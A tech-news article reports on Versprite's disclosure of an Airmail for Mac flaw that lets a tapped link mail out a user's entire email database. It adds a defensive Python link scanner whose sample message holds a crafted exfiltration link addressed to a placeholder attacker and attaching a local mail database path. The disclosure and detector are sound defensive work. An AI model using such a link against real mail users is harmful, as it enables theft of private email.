Security researchers at Versprite have identified security flaws in Airmail for Mac that can expose private data, including an entire account’s email database. The attack requires a user to open a maliciously crafted email and tap a link inside the message. With a combination of technical exploit and phishing attack, it seems like a significant problem.
You can read the full breakdown of the vulnerabilities on the Versprite blog. Essentially, the researchers noticed that Airmail registers a custom URL scheme that can autonomously send an outbound email with particular content and attachment data.
They also discovered that the mail database where Airmail stores the email messages for an account is located in a ‘deterministic’ location in the file system. An unscrupulous attacker can combine these two pieces of information.
You can create a link that uses the Airmail URL scheme such that when it is tapped by the recipient, it sends a new email to the ‘hacker’ that attaches all of the mail messages from the user.
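As an added defender-side illustration (not code from Versprite or Airmail), the following Python scans an HTML email body for links that combine the two ingredients described above: a non-standard URL scheme and a local file path in the link parameters. The `examplemail://` scheme and the sample message are constructed placeholders, not Airmail's actual scheme or parameters.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Schemes a mail client is ordinarily expected to open from a message body.
SAFE_SCHEMES = {"http", "https", "mailto"}
# Fragments that look like a local macOS file path inside a link parameter.
PATH_PATTERN = re.compile(r"(^|[=/])(/Users/|/Library/|~/|file://)", re.IGNORECASE)


class _LinkExtractor(HTMLParser):
    """Collect every href from <a> tags in an HTML body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def extract_links(html):
    parser = _LinkExtractor()
    parser.feed(html)
    return parser.hrefs


def classify_link(href):
    """Return a list of findings for one href; an empty list means nothing suspicious."""
    findings = []
    scheme = urlsplit(href.strip()).scheme.lower()
    if scheme and scheme not in SAFE_SCHEMES:
        findings.append(f"custom scheme '{scheme}'")
    # Percent-decode first so an encoded path like %2FUsers%2F is still caught.
    if PATH_PATTERN.search(unquote(href)):
        findings.append("local file path in link parameters")
    return findings


def scan_email_html(html):
    """Map each flagged link in the body to its findings; clean links are omitted."""
    flagged = {}
    for href in extract_links(html):
        findings = classify_link(href)
        if findings:
            flagged[href] = findings
    return flagged


# Constructed sample message: placeholder scheme, recipient and path, not real values.
SAMPLE = """<p>Click here to see an important message from your bank:</p>
<a href="examplemail://compose?to=attacker%40example.invalid&attach=%2FUsers%2Fvictim%2FLibrary%2FMail.db">View message</a>
<a href="https://bank.example/login">Legitimate link</a>"""
```

Calling `scan_email_html(SAMPLE)` flags only the placeholder-scheme link, with both findings attached, which is the pattern a mail gateway or client could use to warn before opening such a link.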
It is a pretty big security problem as it stands, although there are some mitigations to consider. For a start, an attacker has to know that someone is using Airmail, and has to get the recipient to click on a link in the email they have sent in order for it to work. This particular attack also will not work if the account name has been changed from the default. The researchers identified a related vulnerability that would remove the required user interaction step altogether, but they could not execute it reliably.
If this was exploited in the real world, the malicious link would likely be disguised by some sort of phishing email. Some scary warning like ‘Click here to see an important message from your bank’ would be enough to encourage many people to click through.
Thankfully, there are some obvious ways in which Airmail can defend against these types of exploits so hopefully there will be an update released promptly that addresses the attack vectors.